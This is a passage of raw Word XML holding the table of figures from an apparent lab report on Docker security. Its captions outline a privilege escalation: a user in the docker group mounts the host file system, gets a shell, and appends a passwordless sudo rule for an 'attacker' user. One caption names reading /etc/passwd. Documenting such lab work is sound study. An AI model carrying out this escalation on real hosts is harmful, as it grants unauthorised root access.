            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7FB75BB3" w14:textId="1D18FFB6"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94" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 13: Network topology with the vulnerable application.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867494 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3845E9A6" w14:textId="2B3B2AE4"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95" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 14: Checking Ubuntu version.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867495 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D215673" w14:textId="757CA030"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96" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 15: installing Docker engine on the host machine.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867496 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32FE6F1E" w14:textId="2A7EDB5A"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97" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 16: verification Docker engine.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867497 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65F996C1" w14:textId="5DF006A6"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98" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 17: the laptop specifications.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867498 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3319678B" w14:textId="4D8DA077" w:rsidR="009B5C8A" w:rsidRDefault="00E6142E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc86867499" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 18: user created on the host machine.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867499 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70A61BE1" w14:textId="399B58D7"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00" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 19: output of cat /etc/passwd command on the host.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867500 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F888585" w14:textId="7B2CE194"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01" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 20: output of sudo visudo.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867501 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2376FFAF" w14:textId="5A81D22C"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02" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 21: user added to the Docker group.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867502 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="273B912D" w14:textId="0C32BC97"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03" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 22: output of the getent group command.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867503 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="333D3275" w14:textId="12A42950"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04" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 23: creating file directory for the attacker.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867504 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DC57471" w14:textId="5FD3DEF6"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05" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 24: creating the Dockerfile.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867505 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B10E6E6" w14:textId="0431B6F8"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06" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 25: run the Docker image.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867506 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4276C2D9" w14:textId="40F33CB0"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07" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 26: A container with volume mounted, giving shell access.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867507 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="611DC8A2" w14:textId="2E68049A"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08" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 27: access to the host’s sudoers file system.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867508 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EA6EBD5" w14:textId="002579E4"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09" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 28: appending the syntax to run sudo commands without password.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867509 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74B22351" w14:textId="5A0F710E"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10" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 29: the attacker user is added to the sudoers.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867510 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7101CB91" w14:textId="0A653080"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11" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 30: Dockerfile for OpenSSH-server with SSH port exposed.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc86867511 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CEB5E4D" w14:textId="759906A4"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12" w:history="1">
        <w:r w:rsidR="009B5C8A" w:rsidRPr="00B51094">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 31:Dockerfile with no SSH port exposed.</w:t>
        </w:r>
        <w:r w:rsidR="009B5C8A">
          <w:rPr>
            <w:noProof/>
